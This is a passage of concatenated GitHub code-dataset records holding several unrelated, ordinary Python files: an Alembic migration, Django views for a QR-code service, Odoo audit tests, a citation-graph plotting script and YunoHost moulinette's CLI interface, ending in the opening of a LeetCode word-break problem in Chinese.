fig.savefig(filename, dpi=dpi)\n plot.utils.show(fig)\n\n\ndef _vector_coerce_dense(x):\n x = utils.toarray(x)\n x_1d = x.flatten()\n if not len(x_1d) == x.shape[0]:\n raise ValueError(\n \"x must be a 1D array. Got shape {}\".format(x.shape))\n return x_1d\n\n\ndef _vector_coerce_two_dense(x, y):\n try:\n x = _vector_coerce_dense(x)\n y = _vector_coerce_dense(y)\n except ValueError as e:\n if \"x must be a 1D array. Got shape \" in str(e):\n raise ValueError(\"Expected x and y to be 1D arrays. \"\n \"Got shapes x {}, y {}\".format(x.shape, y.shape))\n else:\n raise\n return x, y\n","repo_name":"mwufi/scprep","sub_path":"scprep/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":14447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"3570860975","text":"\"\"\"update models\n\nRevision ID: 0e38459fb5d2\nRevises: \nCreate Date: 2021-07-16 11:43:11.836686\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0e38459fb5d2'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('courses',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('course_id', sa.Text(), nullable=False),\n sa.Column('course_name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('course_id')\n )\n op.create_table('interests',\n sa.Column('interest_id', sa.Integer(), nullable=False),\n sa.Column('interest_name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('interest_id'),\n sa.UniqueConstraint('interest_name')\n )\n op.create_table('networking_goals',\n sa.Column('networking_goal_id', sa.Integer(), nullable=False),\n sa.Column('networking_goal', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('networking_goal_id'),\n sa.UniqueConstraint('networking_goal')\n )\n op.create_table('time_options',\n sa.Column('time_id', sa.Integer(), nullable=False),\n sa.Column('time_option', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('time_id'),\n sa.UniqueConstraint('time_option')\n )\n op.create_table('students',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(length=64), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('student_id', sa.Integer(), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('firstname', sa.Text(), nullable=True),\n sa.Column('lastname', sa.Text(), nullable=True),\n sa.Column('city', sa.Text(), nullable=True),\n sa.Column('state', sa.Text(), nullable=True),\n sa.Column('country', sa.Text(), nullable=True),\n sa.Column('bio', sa.Text(), nullable=True),\n sa.Column('cohort', sa.Text(), nullable=True),\n sa.Column('linkedin', sa.Text(), nullable=True),\n sa.Column('course_id_to_match', sa.Integer(), nullable=True),\n sa.Column('interest_id_to_match', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['course_id_to_match'], ['courses.id'], ),\n sa.ForeignKeyConstraint(['interest_id_to_match'], ['interests.interest_id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('student_id')\n )\n op.create_index(op.f('ix_students_email'), 'students', ['email'], unique=True)\n op.create_index(op.f('ix_students_username'), 'students', ['username'], unique=True)\n op.create_table('current_courses_record',\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('course_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['course_id'], ['courses.id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('student_id', 'course_id')\n )\n op.create_table('past_courses_record',\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('course_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['course_id'], ['courses.id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('student_id', 'course_id')\n )\n op.create_table('student_interest_record',\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('interest_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['interest_id'], ['interests.interest_id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('student_id', 'interest_id')\n )\n op.create_table('weekly_signups',\n sa.Column('weekly_signup_id', sa.Integer(), nullable=False),\n sa.Column('week_meet', sa.Text(), nullable=True),\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('prime_time_id', sa.Integer(), nullable=False),\n sa.Column('sec_time_id', sa.Integer(), nullable=False),\n sa.Column('prime_networking_goal_id', sa.Integer(), nullable=False),\n sa.Column('sec_networking_goal_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['prime_networking_goal_id'], ['networking_goals.networking_goal_id'], ),\n sa.ForeignKeyConstraint(['prime_time_id'], ['time_options.time_id'], ),\n sa.ForeignKeyConstraint(['sec_networking_goal_id'], ['networking_goals.networking_goal_id'], ),\n sa.ForeignKeyConstraint(['sec_time_id'], ['time_options.time_id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('weekly_signup_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('weekly_signups')\n op.drop_table('student_interest_record')\n op.drop_table('past_courses_record')\n op.drop_table('current_courses_record')\n op.drop_index(op.f('ix_students_username'), table_name='students')\n op.drop_index(op.f('ix_students_email'), table_name='students')\n op.drop_table('students')\n op.drop_table('time_options')\n op.drop_table('networking_goals')\n op.drop_table('interests')\n op.drop_table('courses')\n # ### end Alembic commands ###\n","repo_name":"jli293/PennChats","sub_path":"migrations/versions/0e38459fb5d2_update_models.py","file_name":"0e38459fb5d2_update_models.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4959877442","text":"import random\n\ndef outerLoop(trials):\n total = 0\n for i in range(trials):\n total += ballRun()\n avg = total/trials\n print(\"The average number per trial was \",avg)\n\ndef ballRun():\n balls = ['b','g','r','y']\n index = [0,1,2,3]\n ballsSame = False\n counter = 0\n while not ballsSame:\n counter += 1\n copyindex = index[:]\n firstChoice =random.choice(copyindex)\n copyindex.remove(firstChoice)\n secondChoice = random.choice(copyindex)\n balls[secondChoice] = balls[firstChoice]\n if(all(x==balls[0] for x in balls)):\n ballsSame = True\n return counter\n\n\nouterLoop(10000)\n","repo_name":"ebbitten/ScratchEtc","sub_path":"538/ballColoring.py","file_name":"ballColoring.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24126557927","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseNotFound\nfrom django.contrib.auth import authenticate\nfrom django.forms.models import model_to_dict\nfrom django.core.files.base import File\nfrom .models import Profile, QrCode\nimport qrcode\nfrom .forms import QrForm\nfrom io import BytesIO\nimport random\n\n\n# Create your views here.\n\ndef dashboard(request):\n return render(request, \"views/dashboard.html\")\n\ndef view_qrs(request):\n if not request.user.is_authenticated: return redirect('/')\n profile = model_to_dict(request.user.profile)\n data = {\n 'profile':profile,\n }\n return render(request, \"views/list.html\", data)\n\ndef create(request):\n if not request.user.is_authenticated: return redirect('/')\n if request.method == \"POST\":\n form = QrForm(request.POST)#, request.FILES)\n if form.is_valid():\n model = form.save(commit=False)\n model.user = request.user\n\n\n model.save()\n\n\n blob = BytesIO()\n img = qrcode.make(f'http://{request.get_host()}/qr/redirect/{model.id}')\n img.save(blob, format='PNG')\n model.image.save(f'{random.randint(0, 99999)}.png', File(blob))\n\n \n user_prof = Profile.objects.get(user=request.user)\n user_prof.codes.add(model)\n user_prof.save()\n return redirect(f'/qr/edit/{model.id}')\n form = QrForm()\n data = {\n 'form':form,\n }\n return render(request, \"views/create.html\", data)\n\ndef qr_redirect(request, pk):\n obj = get_object_or_404(QrCode, id=pk)\n return redirect(obj.url)\n\ndef edit_qr(request, pk):\n if not request.user.is_authenticated: return redirect('/')\n obj = get_object_or_404(QrCode, id=pk)\n\n\n if request.method == 'POST':\n if request.POST.get('delete'):\n if obj.user != request.user: return HttpResponseNotFound()\n obj.delete()\n return redirect('/view/')\n else:\n form = QrForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return redirect(request.path)\n\n\n\n if obj.user != request.user: return HttpResponseNotFound()\n\n form = QrForm()\n data = {\n 'obj': obj,\n 'form':QrForm,\n }\n\n return render(request, \"views/edit.html\", data)","repo_name":"ggvick/qr","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"20419008780","text":"import pandas as pd\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\n\ndef sort_dict(data_papers,column_i):\n # this function will sort the papers by years\n #x[1] refers to value of x, while x[0] is the key.\n data_papers_sorted_list=sorted(data_papers.items(), key=lambda x: x[1][column_i])\n\n # convert the list back into the dictionary\n data_papers_sorted={}\n for paper in data_papers_sorted_list:\n data_papers_sorted[paper[0]]=paper[1]\n\n return data_papers_sorted\n\n##### Section: remove non selected children; create data frame #####\n\n# sort papers by years; 1 means the \"2nd column\" of one_paper_data\ndata_all_papers=sort_dict(data_all_papers,1)\n\nbibCode_all_papers=list(data_all_papers.keys())\n\nfrom_all_papers=[]\nto_all_papers=[]\nfor bibCode_one_paper, data_one_paper in data_all_papers.items():\n list_children=data_one_paper[-1]\n list_children_remained=[x for x in list_children if x in bibCode_all_papers]\n data_one_paper[-1]=list_children_remained\n data_all_papers[bibCode_one_paper]=data_one_paper\n\n # create data frame\n num_child=len(list_children_remained)\n\n vrt_name_children_remained=[]\n for bibCode_child_i in list_children_remained:\n vrt_name_multi_lines=data_all_papers[bibCode_child_i][-2]\n vrt_name_children_remained.append(vrt_name_multi_lines)\n\n vrt_name_one_paper=data_all_papers[bibCode_one_paper][-2]\n\n from_one_paper=vrt_name_children_remained # the older paper\n to_one_paper=[vrt_name_one_paper]*num_child # the newer paper\n\n # concatenate the lists\n from_all_papers=from_all_papers+from_one_paper\n to_all_papers=to_all_papers+to_one_paper\n\n##### Section: Draw Graph #####\n\n# Build a dataframe with 4 connections\ndf = pd.DataFrame({ 'from':from_all_papers, 'to':to_all_papers})\n\n# Build your graph\nG=nx.from_pandas_edgelist(df, 'from', 'to', create_using=nx.DiGraph())\n\n# determine vertices' coordinate\nif not nx.is_directed_acyclic_graph(G):\n raise TypeError('Cannot to a graph that is not a DAG')\n\nvertices_sorted=list(nx.topological_sort(G))\n\nnum_vertices=len(vertices_sorted)\n\nposi={}\nfor i in range(num_vertices):\n vrt_name=vertices_sorted[i]\n posi_vert=-i/num_vertices\n posi_hori=random.random()\n posi[vrt_name]=np.array([posi_hori,posi_vert])\n\n# make the vertices less dense\nposi_new = vertices_less_dense(posi)\n\n# logic similar to the EM algorithm to get a \"good graph\"\nfor i in range(round(num_vertices*1.4)):\n posi_new = vertices_less_dense(posi_new)\n\n# if the graph doesn't look good, change figsize and rerun the last 3 lines\nplt.figure(1,figsize=(18,18))\nnx.draw(G,pos=posi_new,with_labels=True, node_size=150, arrows=True)\nplt.show()\n","repo_name":"BayiLi081/slr-r","sub_path":"citation_graph/Citation_Tree.py","file_name":"Citation_Tree.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29064111952","text":"# -*- coding: utf-8 -*-\n# (C) 2021 Smile ()\n# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl).\n\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestAudit(TransactionCase):\n\n def setUp(self):\n super(TestAudit, self).setUp()\n rule_vals = {\n 'name': 'Audit rule on partners',\n 'model_id': self.env.ref('base.model_res_partner').id,\n 'log_create': True\n }\n self.env['audit.rule'].create(rule_vals)\n partner_vals = {\n 'name': 'Partner',\n 'is_company': False,\n 'email': 'LasLabs@ExAmPlE.CoM',\n }\n self.partner = self.env['res.partner'].create(partner_vals)\n\n def test_log_created_on_create(self):\n \"\"\" A log should be created on creating a partner\"\"\"\n log = self.env['audit.log'].search([\n ('model_id', '=', self.env.ref('base.model_res_partner').id),\n ('method', '=', 'create'),\n ('res_id', '=', self.partner.id),\n ], limit=1)\n self.assertEqual(\n log.name, 'Partner', 'No audit log after partner creation')\n\n def test_log_created_on_write(self):\n \"\"\" A log should be created on updating a partner\"\"\"\n self.partner.write({'name': 'Updated Partner'})\n log = self.env['audit.log'].search([\n ('model_id', '=', self.env.ref('base.model_res_partner').id),\n ('method', '=', 'write'),\n ('res_id', '=', self.partner.id),\n ])\n self.assertEqual(\n log.res_id, self.partner.id, 'No audit log after partner updating')\n\n def test_log_created_on_unlink(self):\n \"\"\" A log should be created on deleting a partner\"\"\"\n self.partner.unlink()\n log = self.env['audit.log'].search([\n ('model_id', '=', self.env.ref('base.model_res_partner').id),\n ('method', '=', 'unlink'),\n ('res_id', '=', self.partner.id),\n ])\n self.assertEqual(\n log.name, 'Partner', 'No audit log after partner unlink')\n","repo_name":"Smile-SA/odoo_addons","sub_path":"smile_audit/tests/test_audit.py","file_name":"test_audit.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"63"} +{"seq_id":"9879497397","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport locale\nimport logging\nimport argparse\nimport tempfile\nfrom collections import OrderedDict\nfrom datetime import date, datetime\nfrom subprocess import call\n\nfrom moulinette import m18n, Moulinette\nfrom moulinette.actionsmap import ActionsMap\nfrom moulinette.core import MoulinetteError, MoulinetteValidationError\nfrom moulinette.interfaces import (\n BaseActionsMapParser,\n ExtendedArgumentParser,\n JSONExtendedEncoder,\n)\nfrom moulinette.utils import log\n\n# Monkeypatch _get_action_name function because there is an annoying bug\n# Explained here: https://bugs.python.org/issue29298\n# Fixed by: https://github.com/python/cpython/pull/3680\n# To reproduce the bug, just launch a command line without action\n# For example:\n# yunohost firewall\n# It should display:\n# usage: yunohost firewall {list,reload,allow,disallow,upnp,stop} ... [-h]\n# yunohost firewall: error: the following arguments are required: {list,reload,allow,disallow,upnp,stop}\n# But it display instead:\n# Error: unable to parse arguments 'firewall' because: sequence item 0: expected str instance, NoneType found\n\n\ndef monkey_get_action_name(argument):\n if argument is None:\n return None\n elif argument.option_strings:\n return \"/\".join(argument.option_strings)\n elif argument.metavar not in (None, argparse.SUPPRESS):\n return argument.metavar\n elif argument.dest not in (None, argparse.SUPPRESS):\n return argument.dest\n elif argument.choices:\n return \"{\" + \",\".join(argument.choices) + \"}\"\n else:\n return None\n\n\nargparse._get_action_name = monkey_get_action_name\n\nlogger = log.getLogger(\"moulinette.cli\")\n\n\n# CLI helpers ----------------------------------------------------------\n\nCLI_COLOR_TEMPLATE = \"\\033[{:d}m\\033[1m\"\nEND_CLI_COLOR = \"\\033[m\"\n\ncolors_codes = {\n \"red\": CLI_COLOR_TEMPLATE.format(31),\n \"green\": CLI_COLOR_TEMPLATE.format(32),\n \"yellow\": CLI_COLOR_TEMPLATE.format(33),\n \"blue\": CLI_COLOR_TEMPLATE.format(34),\n \"purple\": CLI_COLOR_TEMPLATE.format(35),\n \"cyan\": CLI_COLOR_TEMPLATE.format(36),\n \"white\": CLI_COLOR_TEMPLATE.format(37),\n}\n\n\ndef colorize(astr, color):\n \"\"\"Colorize a string\n\n Return a colorized string for printing in shell with style ;)\n\n Keyword arguments:\n - astr -- String to colorize\n - color -- Name of the color\n\n \"\"\"\n if os.isatty(1):\n return \"{:s}{:s}{:s}\".format(colors_codes[color], astr, END_CLI_COLOR)\n else:\n return astr\n\n\ndef plain_print_dict(d, depth=0):\n \"\"\"Print in a plain way a dictionary recursively\n\n Print a dictionary recursively for scripting usage to the standard output.\n\n Output formatting:\n >>> d = {'key': 'value', 'list': [1,2], 'dict': {'key2': 'value2'}}\n >>> plain_print_dict(d)\n #key\n value\n #list\n 1\n 2\n #dict\n ##key2\n value2\n\n Keyword arguments:\n - d -- The dictionary to print\n - depth -- The recursive depth of the dictionary\n\n \"\"\"\n # skip first key printing\n if depth == 0 and (isinstance(d, dict) and len(d) == 1):\n _, d = d.popitem()\n if isinstance(d, (tuple, set)):\n d = list(d)\n if isinstance(d, list):\n for v in d:\n plain_print_dict(v, depth + 1)\n elif isinstance(d, dict):\n for k, v in d.items():\n print(\"{}{}\".format(\"#\" * (depth + 1), k))\n plain_print_dict(v, depth + 1)\n else:\n print(d)\n\n\ndef pretty_date(_date):\n \"\"\"Display a date in the current time zone without ms and tzinfo\n\n Argument:\n - date -- The date or datetime to display\n \"\"\"\n import pytz # Lazy loading, this takes like 3+ sec on a RPi2 ?!\n\n # Deduce system timezone\n nowutc = datetime.now(tz=pytz.utc)\n nowtz = datetime.now()\n nowtz = nowtz.replace(tzinfo=pytz.utc)\n offsetHour = nowutc - nowtz\n offsetHour = int(round(offsetHour.total_seconds() / 3600))\n localtz = \"Etc/GMT%+d\" % offsetHour\n\n # Transform naive date into UTC date\n if _date.tzinfo is None:\n _date = _date.replace(tzinfo=pytz.utc)\n\n # Convert UTC date into system locale date\n _date = _date.astimezone(pytz.timezone(localtz))\n if isinstance(_date, datetime):\n return _date.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n return _date.strftime(\"%Y-%m-%d\")\n\n\ndef pretty_print_dict(d, depth=0):\n \"\"\"Print in a pretty way a dictionary recursively\n\n Print a dictionary recursively with colors to the standard output.\n\n Keyword arguments:\n - d -- The dictionary to print\n - depth -- The recursive depth of the dictionary\n\n \"\"\"\n keys = d.keys()\n if not isinstance(d, OrderedDict):\n keys = sorted(keys)\n for k in keys:\n v = d[k]\n k = colorize(str(k), \"purple\")\n if isinstance(v, (tuple, set)):\n v = list(v)\n if isinstance(v, list) and len(v) == 1:\n v = v[0]\n if isinstance(v, dict):\n print(\"{:s}{}: \".format(\" \" * depth, k))\n pretty_print_dict(v, depth + 1)\n elif isinstance(v, list):\n print(\"{:s}{}: \".format(\" \" * depth, k))\n for key, value in enumerate(v):\n if isinstance(value, tuple):\n pretty_print_dict({value[0]: value[1]}, depth + 1)\n elif isinstance(value, dict):\n pretty_print_dict({key: value}, depth + 1)\n else:\n if isinstance(v, date):\n v = pretty_date(v)\n print(\"{:s}- {}\".format(\" \" * (depth + 1), value))\n else:\n if isinstance(v, date):\n v = pretty_date(v)\n print(\"{:s}{}: {}\".format(\" \" * depth, k, v))\n\n\ndef get_locale():\n \"\"\"Return current user eocale\"\"\"\n try:\n lang = locale.getdefaultlocale()[0]\n except Exception:\n # In some edge case the locale lib fails ...\n # c.f. https://forum.yunohost.org/t/error-when-trying-to-enter-user-information-in-admin-panel/11390/11\n lang = os.getenv(\"LANG\")\n if not lang:\n return \"\"\n return lang[:2]\n\n\n# CLI Classes Implementation -------------------------------------------\n\n\nclass TTYHandler(logging.StreamHandler):\n\n \"\"\"TTY log handler\n\n A handler class which prints logging records for a tty. The record is\n neverthemess formatted depending if it is connected to a tty(-like)\n device.\n If it's the case, the level name - optionnaly colorized - is prepended\n to the message and the result is stored in the record as `message_key`\n attribute. That way, a custom formatter can be defined. The default is\n to output just the formatted message.\n Anyway, if the stream is not a tty, just the message is output.\n\n Note that records with a level higher or equal to WARNING are sent to\n stderr. Otherwise, they are sent to stdout.\n\n \"\"\"\n\n LEVELS_COLOR = {\n log.NOTSET: \"white\",\n log.DEBUG: \"white\",\n log.INFO: \"cyan\",\n log.SUCCESS: \"green\",\n log.WARNING: \"yellow\",\n log.ERROR: \"red\",\n log.CRITICAL: \"red\",\n }\n\n def __init__(self, message_key=\"fmessage\"):\n logging.StreamHandler.__init__(self)\n self.message_key = message_key\n\n def format(self, record):\n \"\"\"Enhance message with level and colors if supported.\"\"\"\n msg = record.getMessage()\n if self.supports_color():\n level = \"\"\n if self.level <= log.DEBUG:\n # add level name before message\n level = \"%s \" % record.levelname\n elif record.levelname in [\"SUCCESS\", \"WARNING\", \"ERROR\", \"INFO\"]:\n # add translated level name before message\n level = \"%s \" % m18n.g(record.levelname.lower())\n color = self.LEVELS_COLOR.get(record.levelno, \"white\")\n msg = \"{}{}{}{}\".format(colors_codes[color], level, END_CLI_COLOR, msg)\n if self.formatter:\n # use user-defined formatter\n record.__dict__[self.message_key] = msg\n return self.formatter.format(record)\n return msg\n\n def emit(self, record):\n # set proper stream first\n if record.levelno >= log.WARNING:\n self.stream = sys.stderr\n else:\n self.stream = sys.stdout\n logging.StreamHandler.emit(self, record)\n\n def supports_color(self):\n \"\"\"Check whether current stream supports color.\"\"\"\n if hasattr(self.stream, \"isatty\") and self.stream.isatty():\n return True\n return False\n\n\nclass ActionsMapParser(BaseActionsMapParser):\n\n \"\"\"Actions map's Parser for the CLI\n\n Provide actions map parsing methods for a CLI usage. The parser for\n the arguments is represented by a ExtendedArgumentParser object.\n\n Keyword arguments:\n - parser -- The ExtendedArgumentParser object to use\n - subparser_kwargs -- Arguments to pass to the sub-parser group\n - top_parser -- An ArgumentParser object whose arguments should\n be take into account but not parsed\n\n \"\"\"\n\n def __init__(\n self, parent=None, parser=None, subparser_kwargs=None, top_parser=None\n ):\n super(ActionsMapParser, self).__init__(parent)\n\n if subparser_kwargs is None:\n subparser_kwargs = {\"title\": \"categories\", \"required\": False}\n self._parser = parser or ExtendedArgumentParser()\n self._subparsers = self._parser.add_subparsers(**subparser_kwargs)\n self.global_parser = parent.global_parser if parent else None\n\n if top_parser:\n self.global_parser = self._parser.add_argument_group(\"global arguments\")\n\n # Append each top parser action to the global group\n for action in top_parser._actions:\n action.dest = argparse.SUPPRESS\n self.global_parser._add_action(action)\n\n # Implement virtual properties\n\n interface = \"cli\"\n\n # Implement virtual methods\n\n @staticmethod\n def format_arg_names(name, full):\n if name.startswith(\"-\") and full:\n return [name, full]\n return [name]\n\n def has_global_parser(self):\n return True\n\n def add_category_parser(self, name, category_help=None, **kwargs):\n \"\"\"Add a parser for a category\n\n Keyword arguments:\n - category_help -- A brief description for the category\n\n Returns:\n A new ActionsMapParser object for the category\n\n \"\"\"\n parser = self._subparsers.add_parser(\n name, description=category_help, help=category_help, **kwargs\n )\n return self.__class__(\n parent=self,\n parser=parser,\n subparser_kwargs={\"title\": \"subcommands\", \"required\": True},\n )\n\n def add_subcategory_parser(self, name, subcategory_help=None, **kwargs):\n \"\"\"Add a parser for a subcategory\n\n Keyword arguments:\n - subcategory_help -- A brief description for the category\n\n Returns:\n A new ActionsMapParser object for the category\n\n \"\"\"\n parser = self._subparsers.add_parser(\n name,\n type_=\"subcategory\",\n description=subcategory_help,\n help=subcategory_help,\n **kwargs,\n )\n return self.__class__(\n parent=self,\n parser=parser,\n subparser_kwargs={\"title\": \"actions\", \"required\": True},\n )\n\n def add_action_parser(\n self,\n name,\n tid,\n action_help=None,\n deprecated=False,\n deprecated_alias=[],\n hide_in_help=False,\n **kwargs,\n ):\n \"\"\"Add a parser for an action\n\n Keyword arguments:\n - action_help -- A brief description for the action\n - deprecated -- Wether the action is deprecated\n - deprecated_alias -- A list of deprecated action alias names\n\n Returns:\n A new ExtendedArgumentParser object for the action\n\n \"\"\"\n return self._subparsers.add_parser(\n name,\n type_=\"action\",\n help=action_help,\n description=action_help,\n deprecated=deprecated,\n deprecated_alias=deprecated_alias,\n hide_in_help=hide_in_help,\n )\n\n def auth_method(self, args):\n ret = self.parse_args(args)\n tid = getattr(ret, \"_tid\", [])\n\n # We go down in the subparser tree until we find the leaf\n # corresponding to the tid with a defined authentication\n # (yeah it's a mess because the datastructure is a mess..)\n _p = self._subparsers\n for word in tid[1:]:\n _p = _p.choices[word]\n if hasattr(_p, \"authentication\"):\n return _p.authentication\n else:\n _p = _p._actions[1]\n\n if tid == []:\n return None\n\n raise MoulinetteError(f\"Authentication undefined for {tid} ?\", raw_msg=True)\n\n def parse_args(self, args, **kwargs):\n try:\n return self._parser.parse_args(args)\n except SystemExit:\n raise\n except Exception as e:\n error_message = \"unable to parse arguments '{}' because: {}\".format(\n \" \".join(args),\n e,\n )\n logger.exception(error_message)\n raise MoulinetteValidationError(error_message, raw_msg=True)\n\n def want_to_take_lock(self, args):\n ret = self.parse_args(args)\n tid = getattr(ret, \"_tid\", [])\n if len(tid) == 3:\n _p = self._subparsers.choices[tid[1]]._actions[1].choices[tid[2]]\n elif len(tid) == 4:\n _p = (\n self._subparsers.choices[tid[1]]\n ._actions[1]\n .choices[tid[2]]\n ._actions[1]\n .choices[tid[3]]\n )\n\n return getattr(_p, \"want_to_take_lock\", True)\n\n\nclass Interface:\n\n \"\"\"Command-line Interface for the moulinette\n\n Initialize an interface connected to the standard input/output\n stream and to a given actions map.\n\n Keyword arguments:\n - actionsmap -- The ActionsMap instance to connect to\n\n \"\"\"\n\n type = \"cli\"\n\n def __init__(\n self,\n top_parser=None,\n load_only_category=None,\n actionsmap=None,\n locales_dir=None,\n ):\n # Set user locale\n m18n.set_locale(get_locale())\n\n self.actionsmap = ActionsMap(\n actionsmap,\n ActionsMapParser(top_parser=top_parser),\n load_only_category=load_only_category,\n )\n\n Moulinette._interface = self\n\n def run(self, args, output_as=None, timeout=None):\n \"\"\"Run the moulinette\n\n Process the action corresponding to the given arguments 'args'\n and print the result.\n\n Keyword arguments:\n - args -- A list of argument strings\n - output_as -- Output result in another format. Possible values:\n - json: return a JSON encoded string\n - plain: return a script-readable output\n - none: do not output the result\n - timeout -- Number of seconds before this command will timeout because it can't acquire the lock (meaning that another command is currently running), by default there is no timeout and the command will wait until it can get the lock\n\n \"\"\"\n\n if output_as and output_as not in [\"json\", \"plain\", \"none\"]:\n raise MoulinetteValidationError(\"invalid_usage\")\n\n if not args:\n raise MoulinetteValidationError(\"invalid_usage\")\n\n try:\n ret = self.actionsmap.process(args, timeout=timeout)\n except (KeyboardInterrupt, EOFError):\n raise MoulinetteError(\"operation_interrupted\")\n\n if ret is None or output_as == \"none\":\n return\n\n # Format and print result\n if output_as:\n if output_as == \"json\":\n import json\n\n print(json.dumps(ret, cls=JSONExtendedEncoder))\n else:\n plain_print_dict(ret)\n elif isinstance(ret, dict):\n pretty_print_dict(ret)\n else:\n print(ret)\n\n def authenticate(self, authenticator):\n # Hmpf we have no-use case in yunohost anymore where we need to auth\n # because everything is run as root ...\n # I guess we could imagine some yunohost-independant use-case where\n # moulinette is used to create a CLI for non-root user that needs to\n # auth somehow but hmpf -.-\n msg = m18n.g(\"password\")\n credentials = self.prompt(msg, True, False, color=\"yellow\")\n return authenticator.authenticate_credentials(credentials=credentials)\n\n def prompt(\n self,\n message,\n is_password=False,\n confirm=False,\n color=\"blue\",\n prefill=\"\",\n is_multiline=False,\n autocomplete=[],\n help=None,\n ):\n \"\"\"Prompt for a value\n\n Keyword arguments:\n - color -- The color to use for prompting message\n \"\"\"\n\n if not os.isatty(1):\n raise MoulinetteError(\n \"Not a tty, can't do interactive prompts\", raw_msg=True\n )\n\n def _prompt(message):\n if not is_multiline:\n import prompt_toolkit\n from prompt_toolkit.completion import WordCompleter\n from prompt_toolkit.styles import Style\n\n autocomplete_ = WordCompleter(autocomplete)\n style = Style.from_dict(\n {\n \"\": \"\",\n \"message\": f\"#ansi{color} bold\",\n }\n )\n\n if help:\n\n def bottom_toolbar():\n return [(\"class:\", help)]\n\n else:\n bottom_toolbar = None\n\n colored_message = [\n (\"class:message\", message),\n (\"class:\", \": \"),\n ]\n\n return prompt_toolkit.prompt(\n colored_message,\n bottom_toolbar=bottom_toolbar,\n style=style,\n default=prefill,\n completer=autocomplete_,\n complete_while_typing=True,\n is_password=is_password,\n )\n\n else:\n while True:\n value = input(\n colorize(m18n.g(\"edit_text_question\", message), color)\n )\n value = value.lower().strip()\n if value in [\"\", \"n\", \"no\"]:\n return prefill\n elif value in [\"y\", \"yes\"]:\n break\n\n initial_message = prefill.encode(\"utf-8\")\n\n with tempfile.NamedTemporaryFile(suffix=\".tmp\") as tf:\n tf.write(initial_message)\n tf.flush()\n call([\"editor\", tf.name])\n tf.seek(0)\n edited_message = tf.read()\n return edited_message.decode(\"utf-8\")\n\n value = _prompt(message)\n\n if confirm:\n m = message[0].lower() + message[1:]\n if _prompt(m18n.g(\"confirm\", prompt=m)) != value:\n raise MoulinetteValidationError(\"values_mismatch\")\n\n return value\n\n def display(self, message, style=\"info\"): # i18n: info\n \"\"\"Display a message\"\"\"\n if style == \"success\":\n print(\"{} {}\".format(colorize(m18n.g(\"success\"), \"green\"), message))\n elif style == \"warning\":\n print(\"{} {}\".format(colorize(m18n.g(\"warning\"), \"yellow\"), message))\n elif style == \"error\":\n print(\"{} {}\".format(colorize(m18n.g(\"error\"), \"red\"), message))\n else:\n print(message)\n","repo_name":"YunoHost/moulinette","sub_path":"moulinette/interfaces/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":19962,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"63"} +{"seq_id":"13555245202","text":"\"\"\"\n给定一个非空字符串 s 和一个包含非空单词列表的字典 wordDict,判定 s 是否可以被空格拆分为一个或多个在字典中出现的单词。\n\n说明:\n\n拆分时可以重复使用字典中的单词。\n你可以假设字典中没有重复的单词。\n示例 1:\n\n输入: s = \"leetcode\", wordDict = [\"leet\", \"code\"]\n输出: true\n解释: 返回 true 因为 \"leetcode\" 可以被拆分成 \"leet code\"。\n示例 2:\n\n输入: s = \"applepenapple\", wordDict = [\"apple\", \"pen\"]\n输出: true\n解释: 返回 true 因为 \"applepenapple\" 可以被拆分成 